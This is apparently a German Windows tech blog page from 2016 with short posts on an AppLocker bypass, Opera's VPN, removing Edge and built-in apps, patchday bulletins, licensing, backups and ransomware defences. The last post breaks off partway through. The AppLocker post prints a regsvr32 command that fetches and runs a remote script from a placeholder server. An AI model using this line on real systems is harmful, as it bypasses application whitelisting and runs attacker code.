Antary

Kategorie: Windows

Windows-Schwachstelle erlaubt Umgehung von AppLocker

26. April 2016, 00:21 · von · 0 Kommentare

Microsoft Logo

Das Sicherheitsfeature AppLocker wurde mit Windows 7 eingeführt (nur bei Enterprise bzw. Ultimate vorhanden) und kommt hauptsächlich in Unternehmen zum Einsatz. AppLocker ermöglicht die Steuerung von Anwendungen, App-Paketen, DLLs und Skripten. Damit lassen sich beispielsweise bestimmte Programme auf Black- oder Whitelists setzen. In letzter Zeit wird AppLocker auch häufig gegen Malware und Ransomware eingesetzt, um ungewünschte Aktivitäten auf Systemen zu blockieren. Allerdings wurde jetzt eine Schwachstelle bekannt, wie sich die AppLocker-Ausführungsregeln relativ leicht umgehen lassen.

Der Sicherheitsforscher Casey Smith hat eine Schwachstelle entdeckt, wobei AppLocker mit Hilfe des Befehlszeilenprogramms “Regsvr32” (Microsoft Register Server) ausgehebelt werden kann. Regsvr32 wird üblicherweise zum Registrieren von DLL-Dateien verwendet, was im Normalfall allerdings Administratorrechte erfordert. Jetzt kommt der spannende Punkt: Wenn man dem Register Server eine JavaScript- oder VBScript-Datei übergibt, wird diese ohne weitere Nachfrage ausgeführt. Auch AppLocker greift hierbei nicht und es werden auch keine Administratorrechte angefordert.

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

Mit dieser Technik lassen sich auch Skripte über HTTP oder HTTPS nachladen, da Regsvr32 auch URLs akzeptiert. Da keine Änderungen an der Registry durchgeführt werden, ist ein Missbrauch auch relativ schwer zu erkennen. Bei Github existiert ein Proof of Concept mit einigen Beispiel-Skripten.

Microsoft wurde bereits über das Problem informiert, hat sich aber noch nicht zu Wort gemeldet. Bis dahin kann “regsvr32.exe” über die Windows Firewall blockiert werden, sodass zumindest eine Ausführung über das Netzwerk verhindert werden kann.

Kategorien: Windows Windows 10 Windows 7 Windows 8

Opera zukünftig mit integriertem VPN

22. April 2016, 00:05 · von · 3 Kommentare

Opera Logo

Mit Opera 15 hat das norwegische Unternehmen Opera  Mitte 2013 einen Neuanfang gewagt. Der proprietäre Browser Opera 12 wurde eingestellt und durch einen neuen, auf Chromium basierenden Browser ersetzt. Mittlerweile ist der Browser bei Version 36 angekommen und hat sich trotz einiger Anfangsprobleme durchaus zum Guten entwickelt. Dennoch fristet er nur noch ein Nischendasein.

In der aktuellen Entwicklerversion 38 hat Opera ein interessantes Feature spendiert bekommen: eine kostenfreie VPN-Lösung ohne Begrenzung beim Datenvolumen. Standardmäßig ist die neue Funktion deaktiviert und muss erst in den Einstellungen unter dem Punkt “Datenschutz & Sicherheit” aktiviert werden.

Opera VPN aktivieren

Der VPN-Dienst wird von der Opera-Tochter SurfEasy bereitgestellt, welche bisher nur eine kostenpflichtige VPN-Lösung anbietet. Die in Opera eingebaute VPN-Lösung ist dagegen völlig kostenfrei und auch ohne Anmeldung nutzbar.

Nach dem aktivieren der VPN-Funktion lässt sich die Nutzung über einen Klick in die Adressleiste steuern. Von dort kann das VPN jederzeit ein- und ausgeschaltet werden. Darüber hinaus lassen sich hier auch das verbrauchte Datenvolumen einsehen und der virtuelle Standort festlegen. Aktuell werden Deutschland, Kanada und die USA angeboten. Opera verspricht in Zukunft weitere Standorte zu ergänzen.

Opera VPN

In einem kurzen Test haben die VPN-Funktion und der Standortwechsel einwandfrei funktioniert. Je nach gewähltem Standort war die Verbindung aber relativ langsam, wodurch die Lösung aktuell weniger für YouTube, sondern eher zum Surfen geeignet ist. Hier wird Opera in Zukunft sicher noch nachbessern. Die native Verzahnung mit dem Browser und die einfache Bedienung haben mir aber sehr gut gefallen. Fairerweise sollte ich noch erwähnen, dass es sich eher um einen Proxy-ähnlichen Dienst handelt, der nur für den Browser funktioniert. Eine richtige VPN-Lösung agiert systemweit und kann von jeglicher Software genutzt werden.

In den nächsten Wochen dürfte die VPN-Funktion auch in der Betaversion verfügbar sein, bevor sie dann für die finale Version freigegeben wird.

Download Opera Developer

Kategorien: Internet Software & Apps Windows

Windows 10: Microsoft Edge entfernen

21. April 2016, 00:02 · von · 3 Kommentare

Microsoft Edge Logo

Microsoft Edge ist der neue Standardbrowser unter Windows 10. Doch viele Benutzer können mit dem Browser nichts anfangen, da noch einige wichtige Funktionen fehlen, er sich nur spärlich konfigurieren lässt, einige Webseiten nur mit Darstellungsfehlern angezeigt werden und er alles in allem unfertig wirkt. Zu allem Überfluss kommt Microsoft Edge als sogenannte System-App daher, die sich leider nicht deinstallieren lässt, auch nicht per PowerShell. Allerdings existiert ein Weg, wie man Edge deaktivieren bzw. entfernen kann.

Hierzu öffnet ihr den Explorer und navigiert zum Ordner “C:\Windows\SystemApps“. Dort befinden sich alle System-Apps von Windows 10. Zur Deaktivierung müsst ihr den Ordner der entsprechenden App einfach nur umbenennen. Alternativ kann der Ordner auch gelöscht werden, was ich jedoch nicht empfehlen würde. Der Ordner für Edge besitzt die Bezeichnung “Microsoft.MicrosoftEdge_8wekyb3d8bbwe”.

Microsoft Edge entfernen

Im Grunde seid ihr nun schon fertig. Durch die Umbenennung kann Windows den Edge-Ordner nicht mehr finden. Im Startmenü und der Suche bleibt Edge weiterhin sichtbar, lässt sich aber nicht mehr starten. Des Weiteren besteht die Möglichkeit, dass Microsoft Edge mit einem zukünftigen Windows Update wieder aktiviert werden könnte.

Insgesamt ist die oben beschriebene Methode also nur ein halb garer Versuch zur Deinstallation von Edge. Viel mehr ist derzeit aber nicht möglich.

Kategorien: Tutorials Windows Windows 10

Windows 10 Apps entfernen

20. April 2016, 22:23 · von · 1 Kommentare

Windows 10 Logo

Es existieren mehrere Möglichkeiten um Apps unter Windows 10 zu entfernen. So können sie unter anderem direkt im Startmenü, über die Einstellungen (System, Apps & Features) oder im Windows Store deinstalliert werden. Allerdings funktioniert diese Vorgehensweise nicht bei vorinstallierten Apps. Diese sind in Windows 10 integriert und lassen sich nicht über die oben genannten Wege entfernen. Wie unter Windows 8.1 lautet die Lösung PowerShell.

Einzelne Apps unter Windows 10 entfernen

Zuerst muss die PowerShell mit Administratorrechten gestartet werden. Anschließend können die einzelnen Apps mit folgenden Befehlen deinstalliert werden.

3D Builder deinstallieren

Get-AppxPackage *3d* | Remove-AppxPackage

Alarm & Uhr deinstallieren

Get-AppxPackage *windowsalarms* | Remove-AppxPackage

Begleiter für Telefon deinstallieren

Get-AppxPackage *windowsphone* | Remove-AppxPackage

Erste Schritte deinstallieren

Get-AppxPackage *getstarted* | Remove-AppxPackage

Filme & TV deinstallieren

Get-AppxPackage *zunevideo* | Remove-AppxPackage

Finanzen deinstallieren

Get-AppxPackage *bingfinance* | Remove-AppxPackage

Food & Drink deinstallieren

Get-AppxPackage *bingfood* | Remove-AppxPackage

Fotos deinstallieren

Get-AppxPackage *photos* | Remove-AppxPackage

Gesundheit & Fitness deinstallieren

Get-AppxPackage *binghealth* | Remove-AppxPackage

Groove-Musik deinstallieren

Get-AppxPackage *zunemusic* | Remove-AppxPackage

Kalender & Mail deinstallieren

Get-AppxPackage *windowscommunicationsapps* | Remove-AppxPackage

Kamera deinstallieren

Get-AppxPackage *windowscamera* | Remove-AppxPackage

Karten deinstallieren

Get-AppxPackage *windowsmaps* | Remove-AppxPackage

Kontakte deinstallieren

Get-AppxPackage *people* | Remove-AppxPackage

Microsoft Solitaire Collection deinstallieren

Get-AppxPackage *solitairecollection* | Remove-AppxPackage

Microsoft Wi-Fi deinstallieren

Get-AppxPackage *connectivitystore* | Remove-AppxPackage

Nachrichten deinstallieren

Get-AppxPackage *bingnews* | Remove-AppxPackage

Nachrichten deinstallieren

Get-AppxPackage *messaging* | Remove-AppxPackage

Office holen deinstallieren

Get-AppxPackage *officehub* | Remove-AppxPackage

OneNote deinstallieren

Get-AppxPackage *onenote* | Remove-AppxPackage

Reader deinstallieren

Get-AppxPackage *reader* | Remove-AppxPackage

Reading List deinstallieren

Get-AppxPackage *reading* | Remove-AppxPackage

Rechner deinstallieren

Get-AppxPackage *windowscalculator* | Remove-AppxPackage

Skype UWP Preview deinstallieren

Get-AppxPackage *skypeapp* | Remove-AppxPackage

Sport deinstallieren

Get-AppxPackage *bingsports* | Remove-AppxPackage

Sprachrekorder deinstallieren

Get-AppxPackage *soundrecorder* | Remove-AppxPackage

Store deinstallieren

Get-AppxPackage *windowsstore* | Remove-AppxPackage

Sway deinstallieren

Get-AppxPackage *sway* | Remove-AppxPackage

Telefon deinstallieren

Get-AppxPackage *commsphone* | Remove-AppxPackage

Travel deinstallieren

Get-AppxPackage *bingtravel* | Remove-AppxPackage

Wetter deinstallieren

Get-AppxPackage *bingweather* | Remove-AppxPackage

Xbox deinstallieren

Get-AppxPackage *xboxapp* | Remove-AppxPackage

Die oben aufgeführten Befehle deinstallieren die Apps nur für den aktuell verwenden Benutzeraccount. Möchte man die Apps für alle Benutzer deinstallieren, muss jeweils noch “-allusers” angefügt werden. Hier ein Beispiel:

Get-AppxPackage -allusers *getstarted* | Remove-AppxPackage

Alle Apps unter Windows 10 entfernen

Die Apps sind unter Windows 10 noch tiefer mit dem System verbunden, wie unter Windows 8.1. Aus diesem Grund sollte man die Apps nur löschen, wenn man dies als unbedingt notwendig erachtet und die möglichen Komplikationen vor Augen hat. Es können unter anderem Probleme mit dem Startmenü, Cortana oder den Benachrichtigungen entstehen. Außerdem kann das Entfernen der Standard-Apps bei zukünftigen Windows Updates zu Problemen führen.

Anstatt alle installierten Apps einzeln zu entfernen, können sie auch mit einem einzigen Befehl deinstalliert werden:

Get-AppxPackage | Remove-AppxPackage

Während der oben genannte Befehl nur für den aktuell angemeldeten Benutzer gilt, existiert natürlich auch das Pendant für alle User:

Get-AppxPackage -allusers | Remove-AppxPackage

Zudem lassen sich die Apps auch aus dem Windows-Image entfernen, d.h. neu angelegte Benutzerkonten werden ohne Apps angelegt.

Get-AppXProvisionedPackage -online | Remove-AppxProvisionedPackage -online

Windows 10 Standard Apps wieder installieren

Wer die Standard Apps von Windows 10 wieder installieren möchte kann diesen Befehl nutzen:

Get-AppxPackage -AllUsers| Foreach {Add-AppxPackage -DisableDevelopmentMode -Register "$($_.InstallLocation)\AppXManifest.xml"}

Kategorien: Tutorials Windows Windows 10

BIOS- bzw. UEFI-Version unter Windows anzeigen

17. April 2016, 13:11 · von · 0 Kommentare

Möchte man die BIOS- bzw. UEFI-Version eines PCs oder Servers herausfinden, funktioniert das natürlich über einen Neustart und einem Blick ins BIOS bzw. UEFI. Alternativ kann man die aktuelle Version auch über diverse Tools auslesen, beispielsweise AIDA64. Doch das funktioniert auch einfacher.

Auf PCs mit Windows kann die BIOS- bzw. UEFI-Version über die Eingabeaufforderung (CMD) angezeigt werden. Dazu muss folgender Befehl eingegeben werden:

wmic bios get smbiosbiosversion

Kategorien: Windows

Microsoft-Patchday April 2016

11. April 2016, 19:33 · von · 1 Kommentare

Microsoft Logo

Morgen ist wieder der allmonatliche (zweiter Dienstag jedes Monats) Microsoft-Patchday. Im April 2016 stehen insgesamt 13 sicherheitsrelevante Updates zur Installation bereit. Davon werden sechs als „kritisch“ und sieben als „wichtig“ eingestuft.

Es sind Updates für Windows, Internet Explorer, Microsoft Edge, Office und .NET Framework vorhanden. Auffällig ist, dass zwei Updates explizit nur für Windows 10 veröffentlicht wurden.

Weitere Details wird Microsoft wie immer in Kürze im Security TechCenter zur Verfügung stellen.

Bulletin ID Bulletin Title Maximum Severity Rating and Vulnerability Impact Restart Requirement Affected Software
MS16-037  Cumulative Security Update for Internet Explorer (3148531) Critical
Remote Code Execution		 Requires restart Internet Explorer on all supported editions of Microsoft Windows.
MS16-038  Cumulative Security Update for Microsoft Edge (3148532) Critical
Remote Code Execution		 Requires restart Microsoft Edge on Windows 10.
MS16-039  Security Update for Microsoft Graphics Component (3148522) Critical
Remote Code Execution		 Requires restart All supported releases of Microsoft Windows, .NET Framework 3.0, .NET Framework 3.5, .NET Framework 3.5.1, Office 2007, Office 2010, Word Viewer, Lync 2010, Lync 2013, Skype for Business 2016, and Live Meeting 2007 Console.
MS16-040  Security Update for Microsoft XML Core Services (3148541) Critical
Remote Code Execution		 Requires restart Microsoft XML Core Services 3.0 on all supported editions of Microsoft Windows.
MS16-041  Security Update for .NET Framework (3148789) Important
Remote Code Execution		 May require restart Microsoft .NET Framework 4.6 and Microsoft .NET Framework 4.6.1 on affected releases of Microsoft Windows.
MS16-042  Security Update for Microsoft Office (3148775) Critical
Remote Code Execution		 May require restart Microsoft Office 2007, Office 2010, Office 2013, Office 2013 RT, Office 2016, Office for Mac 2011, Office 2016 for Mac, Office Compatibility Pack, Excel Viewer, and Word Viewer.
MS16-044  Security Update for Windows OLE (3146706) Important
Remote Code Execution		 Requires restart All supported editions of Microsoft Windows, except for Windows 10.
MS16-045  Security Update for Windows Hyper-V (3143118) Important
Remote Code Execution		 Requires restart Windows 8.1 for x64-based Systems, Windows Server 2012, Windows Server 2012 R2, and Windows 10 for x64-based Systems.
MS16-046  Security Update for Secondary Logon (3148538) Important
Elevation of Privilege		 Requires restart Windows 10 and Windows 10 version 1511.
MS16-047  Security Update for SAM and LSAD Remote Protocols (3148527) Important
Elevation of Privilege		 Requires restart All supported editions of Microsoft Windows.
MS16-048  Security Update for CSRSS (3148528) Important
Security Feature Bypass		 Requires restart Windows 8.1, Windows Server 2012, Windows Server 2012 R2, Windows RT 8.1, and Windows 10.
MS16-049  Security Update for HTTP.sys (3148795) Important
Denial of Service		 Requires restart Windows 10 and Windows 10 version 1511.
MS16-050  Security Update for Adobe Flash Player (3154132) Critical
Remote Code Execution		 Requires restart Windows 8.1, Windows Server 2012, Windows Server 2012 R2, Windows RT 8.1, and Windows 10.

Kategorien: Windows

Windows 10 Version 1511 landet im Current Branch for Business (CBB)

10. April 2016, 11:07 · von · 0 Kommentare

Windows 10 Logo

Das erste große Update für Windows 10 ist am 12. November 2015 erschienen. Jetzt steht Windows 10 Version 1511 (Build 10586) im “Current Branch for Business” (CBB) für Geschäftskunden bereit. Damit ist das Feature-Update rund einen Monat später im CBB verfügbar, als eigentlich von Microsoft vorgesehen war. Die Roadmap von Microsoft sieht normalerweise vor, dass eine neue Version ca. vier Monate nach der Veröffentlichung im Current Branch (CB) in den CBB wandert, wo sie dann ca. acht Monate getestet werden kann. Insgesamt stehen also zwölf Monate zur Verfügung, bevor eine neue Version in der Produktivumgebung ausgerollt werden muss.

Alle Computer im Current Branch, bei denen die Update-Option “Upgrades zurückstellen” aktiviert ist, bekommen Windows 10 1511 in wenigen Tagen automatisch ausgerollt. Computer im CBB könnten dann zeitgleich auch auf Version 1511 gehoben werden. Allerdings werden die meisten Kunden hier vermutlich die achtmonatige Testphase nutzen, bevor sie das Update ausrollen. Wer die Frist jedoch verstreichen lässt, bekommt gar keine Updates mehr, auch keine Sicherheitsrelevanten. Wer nach insgesamt zwölf Monaten nicht updaten kann bzw. möchte, sollte auf den “Long Term Service Branch” wechseln, denn dort gibts bis zu zehn Jahre Updates, ohne ein Feature-Update einzuspielen.

Kategorien: Windows Windows 10

Google Drive-Plug-in für Microsoft Office unterstützt jetzt auch Outlook

9. April 2016, 18:06 · von · 0 Kommentare

Microsoft Outlook Logo

Letztes Jahr hat Google das “Google Drive-Plug-in” für Microsoft Office veröffentlicht. Mit Hilfe des Plugins können Dokumente nativ in der Google-Cloud abgelegt, bearbeitet und auch wieder geöffnet werden, alles direkt innerhalb Office. Bisher funktionierte das Ganze in Word, Excel und PowerPoint. Einzige Voraussetzung ist Office 2007 oder höher. Sogar Office 365 wird unterstützt. Die neue Version des Plugins arbeitet jetzt auch mit Outlook zusammen.

Damit ist es möglich Dateien aus Google Drive direkt innerhalb von Outlook zu öffnen oder diese an E-Mails anzuhängen. Außerdem lassen sich Dateien aus Google Drive auch als Link versenden. Das Setzen der entsprechenden Berechtigungen wird automatisch übernommen, kann aber auch noch von Hand angepasst werden. Darüber hinaus können Anhänge aus empfangenen Mails direkt in Google Drive gespeichert werden.

Download Google Drive-Plug-in für Microsoft Office

Kategorien: Software & Apps Windows

Policy Analyzer: Gruppenrichtlinien analysieren

2. April 2016, 10:57 · von · 0 Kommentare

Microsoft Logo

Der Policy Analyzer von Microsoft ist ein neues Tool, welches bei der Analyse und beim Vergleichen von Gruppenrichtlinien (GPOs) hilft. Mit dem Tool lassen sich beispielsweise redundante oder sich widersprechende Gruppenrichtlinien leicht identifizieren. Unterschiedliche Einstellungen werden optisch hervorgehoben. Darüber hinaus können mit dem Policy Analyzer auch Unterschiede zwischen verschiedenen Versionen untersucht oder Vergleiche mit den lokalen Gruppenrichtlinien bzw. Registrierungseinstellung gefahren werden. Die Ergebnisse können als Excel-Tabelle exportiert werden.

Mit dem Policy Analyzer lassen sich mehrere GPOs zu einem einzelnen Element zusammenfassen. Dadurch behält man einen besseren Überblick und es lässt sich quasi eine Art “Baseline” erstellen. Dies ist sehr hilfreich, wenn man zu einem späteren Zeitpunkt einen schnellen Report über alle GPO-Änderungen erhalten möchte.

Alles in allem ist der Policy Analyzer ein sehr nützliches, welches den Administrations-Alltag deutlich vereinfacht.

Download Policy Analyzer und weitere Infos

Policy Analyzer

Kategorien: Software & Apps Windows

Nächstes Windows 10 Update kommt im Juli und heißt offiziell “Anniversary Update”

31. März 2016, 00:24 · von · 1 Kommentare

Windows 10 Logo

Im Rahmen der heute gestarteten Entwicklerkonferenz Build 2016 hat Microsoft ein paar Informationen über das nächste Windows 10 Update veröffentlicht. Der offizielle Name lautet “Anniversary Update”. Die neue Version wurde bisher unter dem Codenamen “Redstone” entwickelt und soll im Sommer 2016 als kostenloses Update für Windows 10 erhältlich sein. Obwohl Microsoft noch keinen genauen Veröffentlichungstermin verlauten ließ, sprechen einige Quellen von Juli 2016. Außerdem gab Microsoft bekannt, dass Windows 10 mittlerweile auf über 270 Millionen Geräten installiert ist.

Das Anniversary Update wird für alle Geräte mit Windows 10 erscheinen. Neben PCs sowie Notebooks werden also auch Tablets, Smartphones, die Xbox One und die Microsoft HoloLens in den Genuss der neuen Version kommen. Die bisher angekündigten Neuerungen halten sich jedoch in Grenzen:

  • Neue Features für Windows Hello (Anmeldung via biometrischen Daten soll auch in Apps und Microsoft Edge möglich sein)
  • Windows Defender erlaubt nun automatisch periodische Schnellscans und zeigt erweiterte Benachrichtigungen an
  • Windows Defender Advanced Threat Protection (WDATP)
  • Windows Information Protection (ehemals Enterprise Data Protection) erlaubt Trennung von von persönlichen Daten und Unternehmensdaten
  • Windows Ink: Verbesserte Eingabe per Stift (Stifteingabe mit Cortana verknüpft, neue Funktionen in Notizen-App, Kommentar-Funktion für Edge, Handschrifteingabe in Office, virtuelles Lineal, eigene Routen in Maps zeichnen)
  • Cortana auch auf dem Sperrbildschirm neue Assistenz-Funktionen verfügbar
  • Erweiterungen für Microsoft Edge, bessere Effizienz soll für längere Akkulaufzeit sorgen
  • Universal Windows Platform (UWP) und Unified Windows Store
  • Verbessertes Info-Center
  • Minimales Ubuntu-System für Windows 10 bringt unter anderem native Unix-Shell Bash und Kommandozeilenwerkzeuge wie Emacs, …

Genaua Details über das Anniversary Update hat Microsoft noch nicht veröffentlicht. Im Laufe der nächsten zwei Tage sollten hier aber weitere Informationen folgen.

Kategorien: Windows Windows 10

Kostenloses Upgrade auf Windows 10: Mainboardwechsel bedeutet Lizenzverlust

26. März 2016, 22:51 · von · 0 Kommentare

Windows 10 Logo

Die kostenlose Upgrademöglichkeit von Windows 7 oder Windows 8.1 auf Windows 10 ist noch bis 29. Juli 2016 verfügbar. Die Frist endet also in rund vier Monaten und mit dem kommenden Redstone-Update werden höchstwahrscheinlich nochmals einige Nutzer das Angebot annehmen. Dabei sollte einem aber klar sein, dass die dann installierte Windows 10 Version an die Hardware gebunden ist. Microsoft hatte diese Tatsache in der Vergangenheit zwar nicht so klar kommuniziert, allerdings konnte man dies schon vermuten. HT4U hat in einem Gespräch mit Microsoft nun die endgültige Bestätigung dafür erhalten.

Demnach sind alle Windows-10-Lizenzen, die durch das Kostenlosangebot erworben wurden, wie gewöhnliche OEM-Lizenzen zu behandeln. Eine Aufrüstung des Rechners ist dann nur noch bis zu einer gewissen Grenze möglich. Ein Austausch der Grafikkarte oder eine Aufrüstung des Arbeitsspeichers sind laut Aussage von Microsoft unproblematisch. Ebenso dürfte es auch beim Wechsel des Prozessors oder der Festplatte keine Probleme geben, auch wenn Microsoft sich hierzu nicht geäußert hat. Faktisch ist alles erlaubt außer ein Mainboardwechsel, der automatisch einem Lizenzverlust gleichzusetzen ist. Normal gekaufte Windows-10-Retail-Lizenzen sind von dieser Problematik natürlich nicht betroffen.

Spitzfindige Nutzer argumentieren jetzt sicherlich, dass in Deutschland OEM- wie Retail-Lizenzen zu behandeln sind und keine Hardwarebindung zulässig sei. Ich sehe das Ganze so, dass es sich um spezielle Upgrade-Lizenzen handelt, bei denen die aktuelle Rechtslage nicht klar auszulegen ist. Microsoft spricht von einer Windows-10-Lizenz “für die unterstützte Lebenszeit des Geräts bzw. der Hardware”. Bei einem Mainboardwechsel erlischt diese Lebenszeit, was übrigens auch nach der deutschen Rechtsprechung zulässig sein sollte. Im Zweifel werden aber sicherlich einige Klagen folgen und die Gerichte dann entscheiden müssen…

So wie es aktuell aussieht müssen Nutzer des kostenlosen Windows-10-Upgrades bei einem Mainboardwechsel entweder eine Retail-Lizenz von Windows 10 erwerben oder wieder ihr altes Windows 7 bzw. 8.1 installieren. Aber vielleicht lässt sich Microsoft bis zum 29. Juli 2016 noch eine Kompromisslösung einfallen. Die Hoffnung stirbt zuletzt.

Kategorien: Windows Windows 10

Veeam Endpoint Backup FREE – Alternative zum Windows-Backup

22. März 2016, 10:22 · von · 0 Kommentare

Veeam Logo

Das Unternehmen Veeam Software ist vor allem durch seine Backup-Lösung für virtuelle Umgebungen von VMware vSphere und Microsoft Hyper-V bekannt. Im April 2015 hat der Hersteller eine kostenlose Backup-Software für Endgeräte mit Windows veröffentlicht. Vor wenigen Tagen ist Veeam Endpoint Backup FREE in Version 1.5 erschienen. Zu den wichtigsten Neuerungen gehören die neue Benachrichtigungsfunktion via E-Mail, eine verbesserte Zeitplanung und ein besserer Schutz vor Ransomware-Attacken, indem das Backup-Ziel vom Rechner getrennt werden kann.

Die Software ermöglicht eine Sicherung sowohl auf Volume- als auch auf Datei-Ebene. Das Backup-Image wird, wie in den kommerziellen Produkten, im VBK-Format erstellt und kann auf weiteren Festplatten, USB-Sticks oder Netzwerkfreigaben abgelegt werden. Nach einem ersten Voll-Backup erstellt Veeam nur mehr inkrementelle Sicherungen, die weniger Zeit und Speicherplatz beanspruchen. Sobald die maximale Zahl von Wiederherstellungspunkten erreicht ist, wird das älteste inkrementelle Backup in das Vollbackup integriert. Damit bleibt die Anzahl der Wiederherstellungspunkte immer konstant. Bei der Wiederherstellung kann zwischen einem Bare-Metal-Recovery via eigenem Boot-Image (auch auf anderer Hardware), einem vollständigen Datenträger oder einzelnen Dateien bzw. Ordnern unterschieden werden.

Veeam Endpoint Backup FREE ist einfach und intuitiv zu bedienen und erfüllt alle wesentlichen Anforderungen für private Anwender oder kleinere Firmen. Die Software ist auf jeden Fall eine gute Alternative zum Windows-Backup.

Veeam Endpoint Backup FREE ist ab Windows 7 SP1 lauffähig und kann direkt beim Hersteller heruntergeladen werden. Allerdings existiert noch ein kleiner Haken: Der Download erfordert einen Veeam-Account.

Download Veeam Endpoint Backup FREE

Veeam Endpoint Backup FREE

Kategorien: Software & Apps Windows

Microsoft SQL Server 2016 auch für Linux

14. März 2016, 13:53 · von · 0 Kommentare

Microsoft SQL Server Logo

Scott Guthrie, Microsoft’s Executive Vice President Cloud and Enterprise Group, hat angekündigt, dass Microsofts SQL Server 2016 diese Woche auf dem Data Driven Event in New York starten soll. Die globale Verfügbarkeit soll später in 2016 erfolgen. Außerdem gibt es noch eine große Überraschung: Der Microsoft SQL Server 2016 soll auch für Linux kommen!

Today I’m excited to announce our plans to bring SQL Server to Linux as well. This will enable SQL Server to deliver a consistent data platform across Windows Server and Linux, as well as on-premises and cloud. We are bringing the core relational database capabilities to preview today, and are targeting availability in mid-2017.

Das Release wird bis Mitte 2017 erwartet. Aktuell arbeite man mit Red Hat zusammen, damit der SQL Server 2016 unter Red Hat Enterprise Linux angeboten werden kann. Darüber hinaus arbeitet aber auch Cononical mit Microsoft zusammen, sodass MSSQL früher oder später auch unter Ubuntu lauffähig sein sollte.

Zeitgleich hat Microsoft auch eine Infoseite online genommen, auf der weitere Informationen bereit stehen. Dort kann man sich auch anmelden, um automatisch die neuesten News und die Preview-Version, sobald verfügbar, zu erhalten.

Kategorien: Software & Apps Windows

Microsoft-Patchday März 2016

9. März 2016, 12:32 · von · 0 Kommentare

Microsoft Logo

Der dritte Microsoft-Patchday des Jahres 2016 beinhaltet insgesamt 13 sicherheitsrelevante Updates. Microsoft stuft fünf davon als “kritisch” und acht als “wichtig” ein.

Nachfolgend ein kurzer Überblick der einzelnen Security-Bulletins. Weitere Details stellt Microsoft wie immer im Security TechCenter zur Verfügung.

Bulletin ID Bulletin Title Maximum Severity Rating and Vulnerability Impact Restart Requirement Affected Software
MS16-023  Cumulative Security Update for Internet Explorer (3142015) Critical
Remote Code Execution		 Requires restart Internet Explorer on all supported editions of Windows.
MS16-024  Cumulative Security Update for Microsoft Edge (3142019) Critical
Remote Code Execution		 Requires restart Microsoft Edge on Windows 10.
MS16-025  Security Update for Windows Library Loading to Address Remote Code Execution (3140709) Important
Remote Code Execution		 Requires restart Windows Vista and Windows Server 2008.
MS16-026  Security Update for Graphic Fonts to Address Remote Code Execution (3143148) Critical
Remote Code Execution		 Requires restart All supported editions of Microsoft Windows.
MS16-027  Security Update for Windows Media to Address Remote Code Execution (3143146) Critical
Remote Code Execution		 May require restart Windows 7, Windows Server 2008 R2, Windows Server 2012, Windows 8.1, Windows Server 2012 R2, Windows RT 8.1, and Windows 10.
MS16-028  Security Update for Microsoft Windows PDF Library to Address Remote Code Execution (3143081) Critical
Remote Code Execution		 May require restart Windows 8.1, Windows Server 2012, Windows Server 2012 R2, and Windows 10.
MS16-029  Security Update for Microsoft Office to Address Remote Code Execution (3141806) Important
Remote Code Execution		 May require restart Microsoft Office 2007, Office 2010, Office 2013, Office 2013 RT, Office 2016, Office for Mac 2011, Office 2016 for Mac, Office Compatibility Pack, Word Viewer, Word Automation Services on SharePoint Server 2010, Word Automation Services on SharePoint Server 2013, Office Web Apps 2010, and Office Web Apps 2013.
MS16-030  Security Update for Windows OLE to Address Remote Code Execution (3143136) Important
Remote Code Execution		 Requires restart All supported editions of Microsoft Windows.
MS16-031  Security Update for Microsoft Windows to Address Elevation of Privilege (3140410) Important
Elevation of Privilege		 Requires restart Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.
MS16-032  Security Update for Secondary Logon to Address Elevation of Privilege (3143141) Important
Elevation of Privilege		 Requires restart All supported editions of Microsoft Windows.
MS16-033  Security Update for Windows USB Mass Storage Class Driver to Address Elevation of Privilege (3143142) Important
Elevation of Privilege		 May require restart All supported editions of Microsoft Windows.
MS16-034  Security Update for Windows Kernel-Mode Drivers to Address Elevation of Privilege (3143145) Important
Elevation of Privilege		 Requires restart All supported editions of Microsoft Windows.
MS16-035  Security Update for .NET Framework to Address Security Feature Bypass (3141780) Important
Security Feature Bypass		 May require restart Microsoft .NET Framework 2.0 SP2, .NET Framework 3.0 SP2, .NET Framework 3.5, .NET Framework 3.5.1, .NET Framework 4.5.2, .NET Framework 4.6, and Microsoft .NET Framework 4.6.1 on affected releases of Microsoft Windows.

Kategorien: Windows

Schutzmaßnahmen gegen Locky, TeslaCrypt, Cryptolocker und Co.

28. Februar 2016, 15:16 · von · 2 Kommentare

Sogenannte Ransomware erfreut sich seit einigen Jahren steigender Beliebtheit. Kurz zusammengefasst handelt es sich dabei um Schadprogramme, welche private Daten auf Computern verschlüsseln und zur Entschlüsselung ein Lösegeld fordern. Aus diesem Grund wird Ransomware oftmals auch als Erpressungs-Trojaner, Verschlüsselungs-Trojaner oder Krypto-Trojaner bezeichnet.

Locky

Seit ca. zwei Wochen ist ein neuer Verschlüsselungs-Trojaner namens Locky aktiv, welcher sehr aggressiv verbreitet wird. Zeitweise lag die Zahl der Neuinfektionen in Deutschland bei über 5.000 pro Stunde. Locky wird fast ausschließlich per E-Mail verbreitet. Oft handelt es sich dabei um erfundene Rechnungen, die als Office-Dokument mit Makro-Code ausgeliefert werden. Erst durch die Ausführung des Makro-Codes wird der eigentliche Trojaner heruntergeladen und ausgeführt, welcher dann als EXE-Datei mit der Verschlüsselung beginnt. Neue Varianten werden allerdings mittlerweile auch als JavaScript-Datei oder Batch-Datei versendet. Locky durchsucht alle angeschlossenen Festplatten, Netzwerkfreigaben und externe Medien und verschlüsselt eine Vielzahl an Dateien. Unter anderem hat es Locky auf Office-Dateien, Bilder, Audio- und Videodateien, Quellcode und Zertifikate abgesehen. Insgesamt verschlüsselt die Ransomware Dateien mit über 150 Endungen. Die verschlüsselten Dateien erhalten kryptische Namen und sind an der Endung “.locky” zu erkennen. Außerdem befindet sich im Ordner eine Datei namens “_Locky_recover_instructions.txt”, die weitere Informationen zum Lösegeld bereithält. Darüber hinaus versucht Locky auch noch sämtliche Schattenkopien zu löschen.

Schutzmaßnahmen

Gegenwärtig gibt es keine Möglichkeit die verschlüsselten Dateien ohne Lösegeld zu retten. Selbst bei einer Lösegeldzahlung ist aber nicht garantiert, dass man anschließend den zur Entschlüsselung benötigten Schlüssel erhält. Aus diesem Grund sollte man so gut es geht vorsorgen. Im besten Fall richtet die Ransomware dann trotz Ausführung keinen oder nur geringen Schaden an.

Folgende Grundsätze sollten immer eingehalten werden:

  • Windows-Benutzer ist kein lokaler Administrator
  • Windows UAC ist aktiviert
  • Windows Firewall ist aktiviert
  • aktueller Virenschutz (Signaturen sind nicht älter als 12 Stunden)
